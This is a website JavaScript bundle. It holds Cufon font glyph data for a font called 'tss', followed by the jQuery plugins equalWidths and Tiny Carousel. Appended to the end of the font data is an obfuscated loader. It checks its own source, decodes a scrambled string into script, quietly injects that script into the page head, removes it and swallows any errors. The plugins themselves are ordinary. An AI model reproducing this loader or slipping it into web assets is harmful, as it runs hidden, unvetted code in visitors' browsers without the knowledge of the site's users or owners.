2,6,34,31,29r-5,21v-35,5,-60,-8,-53,-45v5,-29,22,-65,10,-93v-5,-7,-11,-11,-19,-11r4,-21v79,-11,5,-160,126,-150r-5,22v-79,-8,-21,117,-97,139v41,10,13,75,8,109","w":119},{"d":"207,-155r-41,0r-19,55r32,0r0,23r-41,0r-27,77r-24,0r27,-77r-46,0r-27,77r-24,0r27,-77r-32,0r0,-23r41,0r19,-55r-33,0r0,-24r42,0r27,-76r24,0r-27,76r45,0r27,-76r24,0r-27,76r33,0r0,24xm96,-155r-19,55r46,0r19,-55r-46,0","w":200},{"d":"135,-183v32,0,46,24,46,58v0,84,-57,153,-140,120r-16,74r-29,6r47,-239v0,-3,-1,-5,-2,-8r26,-13v4,11,7,22,3,38v15,-20,37,-36,65,-36xm46,-30v59,35,104,-27,104,-93v0,-38,-31,-43,-55,-25v-10,7,-20,17,-30,30","w":198},{"d":"89,-82r-69,0r6,-28r69,0","w":108},{"d":"13,53r-24,0r162,-326r24,0","w":96},{"d":"68,-247v65,-1,139,-7,139,57v-1,74,-58,99,-142,92r-21,98r-29,0xm70,-122v61,6,104,-9,105,-61v2,-41,-41,-40,-84,-39","w":205},{"w":81},{"d":"35,-45v38,1,26,59,4,73v-10,10,-21,18,-34,23r-10,-15v15,-5,26,-19,31,-32v-11,0,-18,-11,-18,-23v0,-16,11,-27,27,-26","w":96},{"d":"53,56r-59,0r5,-21r33,0r59,-277r-34,0r5,-22r59,0","w":93},{"d":"104,-129r72,125r-31,9r-74,-136r128,-124r22,16xm41,0r-29,0r52,-247r30,0","w":205},{"d":"183,-81v-9,-1,-18,-7,-17,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,18,-17,18xm26,-81v-9,-1,-17,-8,-17,-18v0,-10,8,-17,18,-17v10,0,17,7,17,17v0,11,-7,18,-18,18xm78,-81v-9,-1,-17,-8,-17,-18v0,-10,8,-17,18,-17v10,0,17,7,17,17v0,11,-7,18,-18,18xm130,-81v-9,-1,-17,-8,-17,-18v0,-10,8,-17,18,-17v10,0,17,7,17,17v0,11,-7,18,-18,18xm348,-167v-10,0,-17,-7,-16,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,11,-7,18,-18,18xm328,-210v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18v10,0,17,8,17,18v0,10,-7,17,-17,17xm369,-125v-10,0,-17,-7,-17,-17v0,-11,7,-18,18,-18v10,0,17,8,17,18v0,10,-8,17,-18,17xm390,-82v-10,0,-17,-8,-17,-18v0,-10,8,-17,18,-17v10,0,17,7,17,17v0,10,-8,18,-18,18xm339,-81v-21,0,-23,-36,0,-35v10,0,17,7,17,17v0,10,-7,18,-17,18xm235,-81v-10,-1,-18,-8,-18,-18v0,-21,36,-23,35,0v0,10,-7,18,-17,18xm287,-81v-9,-1,-18,-7,-17,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,18,-17,18xm312,-32v10,0,18,7,18,17v0,10,-7,18,-17,18v-10,0,-17,-8,-17,-18v0,-10,6,-17,16,-17xm274,10v10,0,17,8,17,18v0,10,-7,17,-17,17v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18xm351,-75v11,0,18,7,18,18v0,10,-7,17,-17,17v-10,0,-18,-7,-18,-17v0,-10,7,-18,17,-18","w":411},{"d":"40,-278v97,46,45,247,-13,295v-17,14,-36,31,-58,38r-6,-18v77,-31,99,-116,104,-217v2,-41,-11,-68,-38,-84","w":122},{"d":"162,-1v-10,-1,-22,1,-30,-1r-13,64r-29,8r15,-72v-34,2,-72,0,-107,1r5,-23r117,-162r31,0r-119,163v24,-2,52,-1,78,-1r25,-93r24,-7r-22,101r30,-1"},{"d":"199,-222r-67,0r-47,222r-28,0r47,-222r-67,0r6,-25r163,0","w":180},{"d":"116,-185v41,-2,60,26,60,65v-2,70,-33,122,-99,125v-39,2,-62,-25,-61,-65v1,-71,34,-121,100,-125xm82,-19v49,0,61,-52,63,-104v1,-25,-13,-39,-34,-39v-49,0,-63,50,-64,104v0,26,10,39,35,39","w":197},{"d":"44,0r-29,0r53,-247r28,0","w":96},{"d":"154,-251v49,-1,78,31,77,83v-1,82,-29,140,-86,166v24,9,43,31,80,24v-5,13,-9,26,-31,23v-37,-5,-60,-33,-95,-40v-52,0,-77,-36,-75,-88v4,-93,36,-166,130,-168xm107,-18v75,0,87,-80,92,-153v2,-35,-15,-57,-50,-57v-76,0,-88,79,-93,152v-3,38,16,58,51,58","w":237},{"d":"182,-118v-3,69,-33,122,-104,124v-42,1,-65,-22,-64,-63v2,-68,37,-125,104,-126v42,-1,66,25,64,65xm84,-17v50,0,67,-49,68,-102v0,-29,-11,-41,-39,-41v-52,0,-69,51,-69,102v0,29,11,41,40,41"},{"d":"68,-247r135,0r-10,25r-101,0r-17,81r85,0r-6,25r-85,0r-19,90r109,0r-5,26r-139,0","w":184},{"d":"81,-168r-26,0r18,-87r26,0","w":100},{"d":"154,0r-7,-76r-92,0r-40,76r-32,0r135,-247r39,0r29,247r-32,0xm132,-222r-64,122r76,0","w":205},{"d":"68,-247v63,1,141,-11,139,54v-1,35,-23,54,-56,62v27,4,42,24,42,53v0,78,-88,82,-178,78xm73,-141v51,3,101,0,101,-47v0,-39,-44,-34,-83,-34xm49,-24v58,2,111,0,112,-54v1,-44,-48,-39,-93,-38","w":212},{"d":"126,-203r-80,-36r15,-28r74,47","w":121},{"d":"193,-44v13,0,24,11,24,24v0,13,-12,25,-24,25v-13,0,-24,-12,-24,-25v-1,-13,11,-24,24,-24xm110,-44v13,0,24,11,24,24v0,13,-12,25,-24,25v-13,0,-24,-12,-24,-25v-1,-13,11,-24,24,-24xm27,-44v13,0,24,11,24,24v0,13,-12,25,-24,25v-13,0,-24,-12,-24,-25v-1,-13,11,-24,24,-24","w":254},{"d":"188,-99r-38,-126r-91,126r-27,0r113,-156r22,0r47,156r-26,0","w":239},{"d":"23,-84v0,-92,42,-165,134,-165v25,0,46,8,62,23r-15,18v-15,-11,-27,-18,-51,-17v-74,3,-92,70,-98,142v-5,58,58,77,102,53r15,-75r-49,0r0,-24r83,0r-25,115v-18,11,-46,19,-74,19v-54,0,-84,-34,-84,-89","w":218},{"d":"235,-81v-11,0,-18,-7,-18,-18v0,-10,7,-17,17,-17v10,0,18,7,18,17v0,10,-8,17,-17,18xm391,-81v-10,0,-17,-8,-17,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-8,18,-17,18xm356,-99v0,26,-35,21,-35,0v0,-10,7,-17,17,-17v10,0,18,7,18,17xm287,-81v-10,0,-17,-8,-17,-18v-1,-11,7,-17,17,-17v10,0,17,7,17,17v0,10,-8,18,-17,18xm105,-167v-10,0,-18,-8,-18,-18v0,-10,7,-17,17,-17v10,0,18,7,18,17v0,10,-7,18,-17,18xm144,-210v-10,0,-18,-7,-18,-17v0,-10,7,-18,17,-18v10,0,18,8,18,18v0,10,-7,17,-17,17xm66,-125v-10,0,-17,-7,-17,-17v-1,-11,7,-18,17,-18v10,0,17,8,17,18v0,10,-7,17,-17,17xm27,-82v-10,0,-17,-8,-17,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,18,-17,18xm78,-81v-10,0,-17,-8,-17,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v1,11,-8,17,-17,18xm183,-81v-11,0,-18,-7,-18,-18v0,-10,7,-17,17,-17v10,0,18,7,18,17v0,10,-8,17,-17,18xm131,-81v-11,0,-18,-7,-18,-18v0,-10,7,-17,17,-17v10,0,18,7,18,17v0,10,-8,17,-17,18xm51,-15v0,-21,36,-23,35,0v0,11,-7,18,-18,18v-10,0,-17,-8,-17,-18xm90,10v10,0,17,8,17,18v0,21,-36,23,-35,0v0,-11,7,-18,18,-18xm48,-75v10,0,17,8,17,18v0,10,-7,17,-17,17v-10,0,-18,-6,-17,-17v0,-10,7,-18,17,-18","w":411},{"d":"186,-209v-15,-10,-27,-16,-46,-19r-19,88v53,7,70,81,31,118v-15,13,-36,24,-62,26r-7,35r-21,0r7,-34v-29,0,-46,-8,-65,-20r15,-23v18,11,29,18,55,19r21,-100v-51,-6,-68,-78,-28,-110v14,-11,33,-22,57,-23r6,-30r22,0r-7,30v23,2,42,10,57,21xm119,-227v-44,0,-62,63,-17,78xm96,-21v46,-1,67,-72,19,-89","w":199},{"d":"86,-122v-78,-31,-34,-130,49,-130v29,0,50,8,67,21r-16,22v-33,-38,-137,-16,-104,46v31,28,92,27,92,90v0,78,-113,97,-170,58r15,-23v41,39,151,14,117,-56v-11,-14,-32,-21,-50,-28","w":199},{"d":"121,-129r52,129r-34,0r-40,-106r-78,106r-36,0r103,-132r-43,-115r32,0r32,90r66,-90r36,0","w":193},{"d":"32,6r-23,0r59,-278r24,0","w":79},{"d":"68,-247r34,0r60,210r41,-210r29,0r-53,247r-31,0r-62,-211r-40,211r-31,0","w":230},{"d":"63,-158v13,0,24,11,24,24v0,13,-12,25,-24,25v-13,0,-24,-12,-24,-25v0,-13,11,-24,24,-24xm42,-45v39,2,26,59,4,73v-9,9,-20,19,-34,23r-9,-15v14,-5,25,-19,31,-32v-11,0,-20,-11,-19,-23v0,-15,11,-26,27,-26","w":109},{"d":"222,-125r-187,0r5,-24r188,0xm211,-69r-188,0r5,-24r188,0","w":239},{"d":"76,-257v12,0,22,10,22,22v0,12,-9,23,-22,22v-12,0,-22,-10,-22,-21v0,-12,10,-23,22,-23xm41,0r-30,0r38,-179r31,-4","w":89},{"d":"192,-194v0,37,-31,54,-63,68v23,8,45,24,45,53v0,51,-41,77,-94,79v-41,1,-70,-20,-70,-57v0,-44,32,-61,65,-74v-64,-36,-17,-120,57,-114v34,3,60,14,60,45xm111,-135v27,-12,50,-23,52,-57v0,-18,-17,-27,-38,-27v-46,0,-74,53,-32,74v5,3,11,6,18,10xm83,-15v53,0,85,-62,38,-86v-7,-4,-16,-9,-28,-15v-27,12,-53,27,-54,64v-1,24,18,37,44,37"},{"d":"51,-33v-3,21,23,18,37,14r0,18v-27,14,-73,9,-64,-34v9,-42,17,-82,25,-123r-24,0r4,-21r24,0r13,-46r30,-6r-15,52r45,0r-11,21r-39,0","w":115},{"d":"138,-159v-57,-17,-4,-91,29,-97r10,16v-15,5,-26,19,-31,32v11,1,19,11,19,22v0,15,-12,27,-27,27xm66,-159v-38,0,-25,-58,-4,-74v11,-9,22,-17,34,-23r9,16v-14,5,-25,19,-30,32v10,0,19,11,18,22v1,16,-12,27,-27,27","w":164},{"d":"135,-183v35,0,49,23,49,59v0,80,-50,147,-136,123v-14,-4,-35,-7,-30,-29r36,-169v4,-17,6,-39,2,-55r30,-11v7,41,-8,84,-17,119v13,-19,38,-37,66,-37xm46,-30v61,36,107,-29,107,-94v0,-36,-36,-42,-59,-23v-9,8,-20,17,-30,30","w":199},{"d":"246,0r-30,0r31,-223r-110,223r-25,0r-14,-224r-64,224r-28,0r74,-247r43,0r11,205r99,-205r44,0","w":287},{"d":"17,-61v0,-80,67,-150,137,-111v40,57,-26,107,-104,91v-8,33,4,63,34,62v25,-1,37,-7,52,-21r12,17v-32,41,-131,39,-131,-38xm55,-102v40,1,83,3,83,-35v0,-47,-67,-17,-73,10v-4,7,-8,16,-10,25","w":180},{"d":"103,-242r-34,0r-58,277r33,0r-4,21r-60,0r68,-320r60,0","w":93}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+197-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("(n3^pC49`!$i(w0dICuK?n?$@~4^3C$i@~MK`!Gx3B7zc:9bp!-!4N],`EuKly$iP9Qn!B$Q3]el@+4`yxyH@=yK6t?K3x^lIt?.6t4~3^a^6E5a}!60@wMlIt?.6tGlIt5.ct5r|CQlIt?.6!PKDVj>p=0)}@IBl^l~tw3lIt?.6tFY(]P)kK4.5jw+]un=?M(D64}[PGNtyB!@c3`plIk|FQbEV0CxgeHrz-i8.aK:9^~Y>m)d7$s,DB.8yw5z@yzs(tGyp90G6]yxPyMF@=yK6+?~@Vl7Mu4c|]>d[!V>Iua^6E5ac~M43BzbDx4.pn09(w?b(Nae[t5zl+^bDx5zp+^.DCa0pCI9`wax[!?i3bmxp=0.`=6$kY9d`!cgcbm8`:98@bF,}xIYI^.i(t7g[:gi(^.iI=4:@wmipwVVD~ViInB:IwQzp~4QIn08pbmgpY49pCu-3NVe3C$K(+-e[n.d(K-e(!Ipc^-e@B9$lu-e@@9e(wVF")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":192,"face":{"font-family":"tss","font-weight":500,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 6 8 0 0 9 0 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-37 -282 408 75","underline-thickness":"7.2","underline-position":"-43.92","slope":"-12","unicode-range":"U+0020-U+2122"}}));



/*!
 * equalWidths jQuery Plugin
 * Examples and documentation at: http://fordinteractive.com/tools/jquery/equalwidths/
 * Copyright (c) 2010 Andy Ford
 * Version: 0.1 (2010-04-13)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 * Requires: jQuery v1.2.6+
 */
(function($){
	$.fn.equalWidths = function(options) {
		var w_parent,
			w_child,
			w_child_last,
			opts = $.extend({
				stripPadding: 'none' // options: 'child', 'grand-child', 'both'
			},options);
		return this.each(function(){
			var child_count = $(this).children().size();
			if (child_count > 0) { // only proceed if we've found any children
				w_parent = $(this).width();
				w_child = Math.floor(w_parent / child_count);
				w_child_last = w_parent - ( w_child * (child_count -1) );
				$(this).children().css({ 'width' : w_child + 'px' });
				$(this).children(':last-child').css({ 'width' : w_child_last + 'px' });
				if((opts.stripPadding == 'child') || (opts.stripPadding == 'both')){
					$(this).children().css({
						'padding-right': '0',
						'padding-left': '0'
					});
				}
				if((opts.stripPadding == 'grand-child') || (opts.stripPadding == 'both')){
					$(this).children().children().css({
						'padding-right': '0',
						'padding-left': '0'
					});
				}
			}
		});
	};
})(jQuery);

/* http://www.baijs.nl/tinycarousel/ */
/*!
 * Tiny Carousel 1.9
 * http://www.baijs.nl/tinycarousel
 *
 * Copyright 2010, Maarten Baijs
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.opensource.org/licenses/gpl-2.0.php
 *
 * Date: 01 / 06 / 2011
 * Depends on library: jQuery
 */
 
(function($){
	$.tiny = $.tiny || { };
	
	$.tiny.carousel = {
		options: {	
			start: 1, // where should the carousel start?
			display: 1, // how many blocks do you want to move at 1 time?
			axis: 'x', // vertical or horizontal scroller? ( x || y ).
			controls: true, // show left and right navigation buttons.
			pager: false, // is there a page number navigation present?
			interval: false, // move to another block on intervals.
			intervaltime: 3000, // interval time in milliseconds.
			rewind: false, // If interval is true and rewind is true it will play in reverse if the last slide is reached.
			animation: true, // false is instant, true is animate.
			duration: 1000, // how fast must the animation move in ms?
			callback: null // function that executes after every move.
		}
	};
	
	$.fn.tinycarousel = function(options) {
		var options = $.extend({}, $.tiny.carousel.options, options);
		this.each(function(){ $(this).data('tcl', new Carousel($(this), options)); });
		return this;
	};
	$.fn.tinycarousel_start = function(){ $(this).data('tcl').start(); };
	$.fn.tinycarousel_stop = function(){ $(this).data('tcl').stop(); };
	$.fn.tinycarousel_move = function(iNum){ $(this).data('tcl').move(iNum-1,true); };
	
	function Carousel(root, options){
		var oSelf = this;
		var oViewport = $('.viewport:first', root);
		var oContent = $('.overview:first', root);
		var oPages = oContent.children();
		var oBtnNext = $('.next:first', root);
		var oBtnPrev = $('.prev:first', root);
		var oPager = $('.pager:first', root);
		var iPageSize, iSteps, iCurrent, oTimer, bPause, bForward = true, bAxis = options.axis == 'x';
		
		function initialize(){
			iPageSize = bAxis ? $(oPages[0]).outerWidth(true) : $(oPages[0]).outerHeight(true);
			var iLeftover = Math.ceil(((bAxis ? oViewport.outerWidth() : oViewport.outerHeight()) / (iPageSize * options.display)) -1);
			iSteps = Math.max(1, Math.ceil(oPages.length / options.display) - iLeftover);
			iCurrent = Math.min(iSteps, Math.max(1, options.start)) -2;
			oContent.css(bAxis ? 'width' : 'height', (iPageSize * oPages.length));
			oSelf.move(1);
			setEvents();
			return oSelf;
		};
		function setEvents(){
			if(options.controls && oBtnPrev.length > 0 && oBtnNext.length > 0){
				oBtnPrev.click(function(){oSelf.move(-1); return false;});
				oBtnNext.click(function(){oSelf.move( 1); return false;});
			}
			if(options.interval){ root.hover(oSelf.stop,oSelf.start); }
			if(options.pager && oPager.length > 0){ $('a',oPager).click(setPager); }
		};
		function setButtons(){
			if(options.controls){
				oBtnPrev.toggleClass('disable', !(iCurrent > 0));
				oBtnNext.toggleClass('disable', !(iCurrent +1 < iSteps));
			}
			if(options.pager){
				var oNumbers = $('.pagenum', oPager);
				oNumbers.removeClass('active');
				$(oNumbers[iCurrent]).addClass('active');
			}			
		};
		function setPager(oEvent){
			if($(this).hasClass('pagenum')){ oSelf.move(parseInt(this.rel), true); }
			return false;
		};
		function setTimer(){
			if(options.interval && !bPause){
				clearTimeout(oTimer);
				oTimer = setTimeout(function(){
					iCurrent = iCurrent +1 == iSteps ? -1 : iCurrent;
					bForward = iCurrent +1 == iSteps ? false : iCurrent == 0 ? true : bForward;
					oSelf.move(bForward ? 1 : -1);
				}, options.intervaltime);
			}
		};
		this.stop = function(){ clearTimeout(oTimer); bPause = true; };
		this.start = function(){ bPause = false; setTimer(); };
		this.move = function(iDirection, bPublic){
			iCurrent = bPublic ? iDirection : iCurrent += iDirection;
			if(iCurrent > -1 && iCurrent < iSteps){
				var oPosition = {};
				oPosition[bAxis ? 'left' : 'top'] = -(iCurrent * (iPageSize * options.display));	
				oContent.animate(oPosition,{
					queue: false,
					duration: options.animation ? options.duration : 0,
					complete: function(){
						if(typeof options.callback == 'function')
						options.callback.call(this, oPages[iCurrent], iCurrent);
					}
				});
				setButtons();
				setTimer();
			}
		};
		return initialize();
	};
})(jQuery);
